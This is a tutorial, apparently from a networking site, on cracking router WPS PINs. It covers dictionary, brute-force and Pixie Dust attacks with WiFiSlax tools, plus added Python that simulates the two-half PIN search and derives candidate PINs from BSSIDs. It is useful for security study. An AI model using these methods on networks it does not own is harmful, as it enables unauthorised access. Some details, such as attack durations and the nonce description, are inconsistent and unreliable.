
All methods to crack WPS from WiFi routers

WPS (Wi-Fi Protected Setup) is an inherently insecure way of joining a WiFi network. Today WPS can only be used on networks protected with WPA or WPA2; it disappears completely in WPA3, which drops it to improve the security of WiFi networks. WPS can be cracked with several methods that exist today, some more involved and some easier. If you want to recover a WPA or WPA2 password, it is usually better to go after the router's WPS than after the passphrase itself, because it is much easier and faster to crack. Today in RedesZone we explain how WPS works and how it can be cracked.

How WPS Works

WPS (Wi-Fi Protected Setup) is a method of connecting to WiFi networks based on either entering a PIN code or pressing a button on the router (push-button configuration). Normally routers support both methods; however, some manufacturers only allow the push-button method and remove PIN authentication from the router.

The big problem with WPS comes from the PIN method. A WPS PIN is always exactly 8 digits, so in principle there would be 10^8 = 100,000,000 combinations. However, by the very construction of the protocol, the PIN is split into two halves of four digits each, and the router tells the attacker whether the first half is correct before the second half is ever checked. The two halves can therefore be cracked separately: 10,000 possibilities for the first half and 10,000 for the second, which greatly simplifies a brute-force attack. Finally, according to the standard, the last digit of the second half is a checksum calculated from the other 7 digits, so it is not a free digit, and the second half has only 1,000 possibilities. In total a WPS PIN has at most 10,000 + 1,000 = 11,000 combinations to try. With only 11,000 possibilities, brute-force cracking is very feasible and can be completed in up to 48 hours.

Some router manufacturers have built a limit on failed attempts into WPS. Depending on the manufacturer and how the firmware is programmed, we can enter the PIN code about 5 times, after which the router blocks WPS PIN access, in some firmwares permanently, so that it can no longer be used. However, we found that many ISP-supplied routers do not have this protection, so they can be broken into easily and quickly.
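The following is an added example for this article, not code from RedesZone, WiFiSlax, WPSPinGenerator or Bullyciosa. It implements the WPS PIN checksum and the two-half search described above, and runs it against a simulated router (no WiFi traffic is sent) so the 11,000-attempt bound and the effect of an attempt limit can be seen directly. The names SimulatedAP, brute_force and the target PIN 12345670 are constructed for the illustration.

```python
from typing import Optional, Tuple

# Added example (not the article's or any WiFiSlax tool's code). Simulates the WPS
# registrar behaviour that makes the two halves of the PIN attackable separately.

def wps_checksum(pin7: int) -> int:
    """Checksum digit of a WPS PIN: odd-position digits weighted 3, even-position
    digits weighted 1, summed mod 10 (the formula from the WPS specification)."""
    acc = 0
    while pin7:
        acc += 3 * (pin7 % 10)
        pin7 //= 10
        acc += pin7 % 10
        pin7 //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if the 8-digit PIN's last digit is the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def search_space(checksum_in_last_digit: bool = True) -> int:
    """Maximum PIN attempts when the halves are attacked one after the other."""
    return 10_000 + (1_000 if checksum_in_last_digit else 10_000)


class SimulatedAP:
    """Stand-in for the router's WPS registrar. A real AP answers M4 with a NACK when
    the first half is wrong and M6 with a NACK when the second half is wrong, which
    is what lets an attacker confirm each half on its own."""

    def __init__(self, pin: str, lockout_after: Optional[int] = None):
        self.pin = pin
        self.lockout_after = lockout_after  # None = no attempt limit (many ISP routers)
        self.attempts = 0
        self.locked = False

    def try_pin(self, candidate: str) -> str:
        if self.locked:
            return "locked"
        if self.lockout_after is not None and self.attempts >= self.lockout_after:
            self.locked = True               # firmware with a limit: WPS goes dead
            return "locked"
        self.attempts += 1
        if candidate[:4] != self.pin[:4]:
            return "first_half_wrong"        # NACK after M4
        if candidate[4:] != self.pin[4:]:
            return "second_half_wrong"       # NACK after M6
        return "ok"                          # M7 would deliver the WPA/WPA2 passphrase


def brute_force(ap: SimulatedAP, checksum_in_last_digit: bool = True) -> Tuple[Optional[str], int]:
    """Return (pin, attempts); pin is None if the AP locked WPS before we finished."""
    first_half = None
    for p1 in range(10_000):                 # phase 1: at most 10,000 tries
        cand = f"{p1:04d}0000"
        reply = ap.try_pin(cand)
        if reply == "locked":
            return None, ap.attempts
        if reply == "ok":
            return cand, ap.attempts
        if reply == "second_half_wrong":     # first half confirmed, stop guessing it
            first_half = cand[:4]
            break
    if first_half is None:
        return None, ap.attempts
    if checksum_in_last_digit:               # phase 2: 1,000 tries, last digit computed
        cands = [f"{first_half}{p2:03d}{wps_checksum(int(first_half) * 1000 + p2)}"
                 for p2 in range(1_000)]
    else:                                    # firmware that ignores the checksum: 10,000 tries
        cands = [f"{first_half}{p2:04d}" for p2 in range(10_000)]
    for cand in cands:
        reply = ap.try_pin(cand)
        if reply == "locked":
            return None, ap.attempts
        if reply == "ok":
            return cand, ap.attempts
    return None, ap.attempts


if __name__ == "__main__":
    print(search_space())                           # 11000 instead of 100000000
    print(brute_force(SimulatedAP("12345670")))     # ('12345670', 1803)
    print(brute_force(SimulatedAP("12345670", 5)))  # (None, 5): attempt limit hit
```

The first-half probe always sends "0000" as the second half: the reply distinguishes "wrong first half" from "right first half, wrong second half", so the second half is only searched once. Against the router with a 5-attempt limit the search dies after 5 tries, which is exactly why the dictionary attack described later is tried first on such routers.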

The other connection method is to press a button on the router: once pressed, any device that connects within the next 60 to 120 seconds is let onto the wireless network without entering a PIN or password. This has an intrinsic security issue too: during that window we are "vulnerable" to an intruder joining our network. There are programs that can be left running which connect automatically to the router as soon as the WPS button is pressed and obtain the WPA-PSK or WPA2-PSK key. So push-button WPS is also a risk, for those 60 or 120 seconds.

WiFiSlax: the Swiss army knife for cracking WPS

WiFiSlax is one of the most widely used Linux distributions for auditing wireless networks, whether they use WEP, WPA or WPA2 encryption, and it can also attack WPS (Wi-Fi Protected Setup). WiFiSlax currently ships a large number of tools that attack WPS in different ways: by brute force, by dictionary with a PIN generator, and with other methods such as the Pixie Dust attack.

All the tools currently available in WiFiSlax for this are listed in the WPS section of the menu, which you reach via Start / WiFiSlax / Wireless WPS, as shown in the menu screenshot:

Now that we have seen the WiFiSlax menu with all its tools, let's look at the methods we can use to crack WPS and the tools for each. We will point out the tools we use in our own WiFi audits; several scripts do exactly the same job, so there are alternatives to choose from.

Crack the WPS by dictionary

Some ISP routers, as well as some routers sold at retail, come with a WPS PIN preconfigured at the factory. This means a given router model has one or more known preconfigured PINs that we can try: if the user has not changed the factory WPS PIN, we can get straight onto the WiFi network by trying a handful of well-known PINs.

The program WPSPinGenerator (WPA Attack with PINS Generator) is one of the best for attacking WPS with a dictionary. While it runs, it offers these options:

  • Find targets with WPS enabled: searches for all routers in range that have WPS enabled. This is the first thing we have to do.
  • Generic PIN test / calculated by algorithm: once the targets have been found, this option shows and tests the PINs held in the program's PIN database (generic factory PINs and PINs calculated by algorithm from the router's BSSID). By default it tries around 3 to 5 PINs per target and can crack WPS in a few seconds, without any brute-force attack.
  • Test all possible pins (brute force): attacks WPS by brute force, trying every possible PIN, so the program covers both methods (dictionary and brute force).
  • Select another target
  • Exit

Using the program is really simple: just follow the console wizard. The only requirement is a WiFi adapter that the operating system supports and that the WPS tools can drive (monitor mode and packet injection); currently the vast majority of cards with a Realtek chipset work.

With this dictionary attack, even if the router limits WPS attempts, it is very likely that we will get the WPA-PSK or WPA2-PSK key in very few attempts, before the router cuts us off. This makes it one of the fastest attacks we can run, provided the router still has its default PIN.
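As an added illustration of what "a PIN calculated by algorithm" means in the option above (this is not RedesZone's or WPSPinGenerator's code, and its PIN database is not reproduced), the block below derives a candidate PIN from a BSSID with ComputePIN, a public algorithm by ZhaoChunsheng that takes the low 24 bits of the MAC modulo 10^7 and appends the checksum digit, and builds the short, duplicate-free list a dictionary attack would try before falling back to brute force. Which router models actually ship such PINs is not stated in the article, the two generic PINs are a constructed sample, and the BSSID used is made up.

```python
from typing import List

# Added example (not the article's or WPSPinGenerator's code). Builds the small PIN
# list a dictionary attack tries first: generic defaults plus a BSSID-derived PIN.

def wps_checksum(pin7: int) -> int:
    """Checksum digit: 3 x (1st,3rd,5th,7th digits) + (2nd,4th,6th digits), mod 10."""
    d = [int(c) for c in f"{pin7:07d}"]
    return (10 - (3 * sum(d[0::2]) + sum(d[1::2])) % 10) % 10


def normalize_bssid(bssid: str) -> str:
    """Accept AA:BB:CC:DD:EE:FF or AA-BB-CC-DD-EE-FF; return 12 upper-case hex digits."""
    mac = bssid.replace(":", "").replace("-", "").upper()
    if len(mac) != 12 or any(c not in "0123456789ABCDEF" for c in mac):
        raise ValueError(f"not a BSSID: {bssid!r}")
    return mac


def compute_pin(bssid: str) -> str:
    """ComputePIN (ZhaoChunsheng): low 24 bits of the BSSID mod 10^7, plus checksum.
    Only routers that generate their factory PIN this way are affected."""
    pin7 = int(normalize_bssid(bssid)[-6:], 16) % 10_000_000
    return f"{pin7:07d}{wps_checksum(pin7)}"


# Constructed two-entry sample of generic PINs, not the tool's database.
# 12345670 is the classic factory default seen on many routers.
GENERIC_PINS = ["12345670", "00000000"]


def candidate_pins(bssid: str) -> List[str]:
    """Ordered PIN list for one target: generic PINs first, then the computed one.
    Duplicates are dropped so no attempt is wasted on a router with an attempt limit."""
    seen, out = set(), []
    for pin in GENERIC_PINS + [compute_pin(bssid)]:
        if pin not in seen:
            seen.add(pin)
            out.append(pin)
    return out


if __name__ == "__main__":
    for pin in candidate_pins("00:11:22:33:44:55"):   # constructed BSSID
        print(pin)                                     # 12345670, 00000000, 33598291
```

Three candidates is well under the 5-attempt limit some firmwares enforce, which is the whole point of trying the dictionary before any brute force.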

Crack the WPS by brute force

This WPS attack method has two main problems: time, since it can take up to 72 hours if you are unlucky with the PIN, and the PIN attempt limit in the router's firmware.

If the router's firmware limits PIN attempts, then depending on how it is programmed we may not be able to keep brute-forcing PINs until the router is rebooted, although in some cases the firmware only leaves WPS inoperative for a certain period (an hour, a day, etc.). Even so, it is worth trying the brute-force attack to find out whether or not the router enforces an attempt limit.

Today there are many programs that attack WPS by brute force. For example, the WPSPinGenerator program above can brute-force as well, but our preferred tool is Bullyciosa, an all-in-one script that can:

  1. Detect WPS on all the routers around us.
  2. Brute-force the WPS PIN both on routers whose PIN does not include the checksum in the last digit of the second half and on those that do, calculating the checksum fully automatically.

Another feature of this program is that it lets us resume the WPS attack from whatever PIN number we choose, so an interrupted session does not start from scratch. Depending on the router's PIN, the attack may take from a few minutes to about 48 hours; it depends on how the WiFi card behaves with WPS, on the router's WPS implementation, on the distance to the access point, and so on.

Destroy the WPS with Pixie Dust Attack

Pixie Dust Attack is an attack against the WPS protocol that captures the packet exchange between the target router and the attacker and then cracks the PIN offline. It is much faster than attacking WPS by dictionary or brute force because, once the exchange is captured, the cracking no longer depends on further messages between the router and the attacker. It works because some chipsets generate the registrar's secret nonces in a predictable way, which lets the PIN be recovered from a single captured exchange. The tool PixieScript automates this process and completes it in seconds; however, not all routers are vulnerable, and it is very likely that the manufacturers of the affected WiFi routers have already fixed this problem in their firmware and implemented WPS in a more secure way.

Another very interesting feature of PixieScript is that it includes a small database of BSSIDs (wireless MAC addresses) of known affected access points, which can be viewed from within the script itself.

As you have seen, we can crack the WPS of WiFi routers in these three ways. The fastest is the Pixie Dust attack, but not all routers are affected by that flaw in their WPS implementation, so the next fastest is a dictionary attack with WPSPinGenerator and the routers' default WPS PINs. Finally, brute force can take hours, but it gets there with patience, unless the router limits the number of attempts and disables WPS temporarily.
